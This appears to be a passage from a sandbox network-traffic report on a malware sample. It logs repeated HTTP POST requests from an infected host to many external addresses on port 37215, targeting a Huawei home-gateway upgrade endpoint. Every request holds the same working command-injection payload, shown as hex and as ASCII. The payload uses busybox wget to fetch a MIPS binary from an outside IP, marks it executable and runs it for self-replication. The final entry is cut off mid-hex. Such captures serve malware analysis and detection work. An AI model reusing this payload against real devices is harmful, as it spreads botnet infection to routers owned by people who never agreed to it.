                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  135192.168.2.1336072202.75.55.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063873053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  136192.168.2.134829441.134.225.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063873053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  137192.168.2.133700041.50.38.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063909054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  138192.168.2.1344432190.216.109.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063910007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  139192.168.2.1346010197.231.99.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.063946962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  140192.168.2.135635841.75.31.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064470053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  141192.168.2.135008841.173.185.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064506054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  142192.168.2.1351216197.97.82.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064521074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  143192.168.2.1358782205.156.147.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064528942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  144192.168.2.134336268.199.250.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064528942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 